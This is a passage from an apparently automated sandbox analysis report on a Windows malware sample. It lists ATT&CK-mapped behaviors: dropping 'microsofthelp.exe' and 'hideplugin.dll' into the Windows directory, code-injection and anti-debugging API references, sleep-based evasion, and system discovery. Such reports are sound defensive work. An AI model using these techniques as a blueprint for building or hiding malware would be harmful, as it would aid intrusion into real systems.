\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"microsofthelp.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\version.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" trying to touch file \"C:\\Windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" writes file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" writes file \"c:\\windows\\hideplugin.dll\"\n \"microsofthelp.exe\" writes file \"%windir%\\microsofthelp.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005804]\n \"MICROSOFTHELP.EXE.67A47CD0.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" touched file \"C:\\Windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" touched file \"C:\\Windows\\HidePlugin.dll\"\n \"microsofthelp.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"microsofthelp.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"A146DF795B94099D05FA2533760B4728CABEE46D91F047D64776B91C9BF3C3FC\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Possibly tries to evade analysis by sleeping many times\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"WaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-148", "type": 2, "relevance": 1, "name": "Contains ability to register a top-level exception handler (API string)", "description": "Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"SetUnhandledExceptionFilter\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"SetUnhandledExceptionFilter\" (Indicator: \"UnhandledExceptionFilter\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000964)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"IsWow64Process\" with parameter \"6008\" - (UID: 00000000-00006008)\n \"microsofthelp.exe\" called \"IsWow64Process\" with parameter \"5804\" - (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f00600a2f005b0a2f00000000000000000000002c0000000001ecd912000000000050e7120095e1e7767d011700feffffff435ceb765059eb76aa000000b80000005a0a2f00580a2f0074db1200acdf1200000000000000000000000000000000000000000000000000600d000000002c001c5cea7660d8ec74ffffffff1700000024db1200240000000300000014e0120040e51200acdf12008600000050db120096edeb76820a2f00a06ac1748600000074db1200acdf12000000000086008800a06ac17474db1200916cc174820a2f00a06ac174a06ac174e4df120002020000 (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b4ef1200000000003800000004f01200feffffff8cef1200cf00ec76d600ec76c8f9ee76380000001c00000004f012000000000060ef120000000000c8ef1200 (UID: 00000000-00005804)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"microsofthelp.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005804)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00006008)\n \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00006008)\n 